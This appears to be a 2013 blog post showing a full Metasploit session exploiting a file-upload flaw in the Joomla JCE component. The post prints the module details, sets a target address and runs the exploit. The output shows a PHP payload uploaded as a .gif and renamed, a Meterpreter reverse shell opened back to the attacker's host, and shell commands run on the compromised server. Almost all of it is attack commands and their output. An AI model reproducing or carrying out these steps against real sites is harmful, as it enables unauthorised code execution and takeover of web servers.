Wednesday, March 27, 2013

Joomla Component JCE File Upload Remote Code Execution Metasploit Module



________________________________________________________

msf > use exploit/unix/webapp/joomla_comjce_imgmanager 
msf exploit(joomla_comjce_imgmanager) > info

       Name: Joomla Component JCE File Upload Remote Code Execution
     Module: exploit/unix/webapp/joomla_comjce_imgmanager
    Version: 0
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Unknown
  Heyder Andrade

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       Joomla directory path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the JCE component for 
  Joomla!, which could allow an unauthenticated remote attacker to 
  upload arbitrary files, caused by the fails to sufficiently sanitize 
  user-supplied input. Sending specially-crafted HTTP request, a 
  remote attacker could exploit this vulnerability to upload a 
  malicious PHP script, which could allow the attacker to execute 
  arbitrary PHP code on the vulnerable system. This module has been 
  tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.

References:
  http://www.securityfocus.com/bid/49338
  http://www.exploit-db.com/exploits/17734

msf exploit(joomla_comjce_imgmanager) > set RHOST 172.16.86.133
RHOST => 172.16.86.133
msf exploit(joomla_comjce_imgmanager) > exploit 

[*] Started reverse handler on 172.16.86.1:4444 
[*] Checking component version to 172.16.86.133:80
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to 172.16.86.133
[*] Meterpreter session 1 opened (172.16.86.1:4444 -> 172.16.86.133:60773) at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
pwd
/var/www/joomla/images/stories
^C
Terminate channel 0? [y/N]  y
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 172.16.86.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(joomla_comjce_imgmanager) > 


___________________________________________________________



No comments: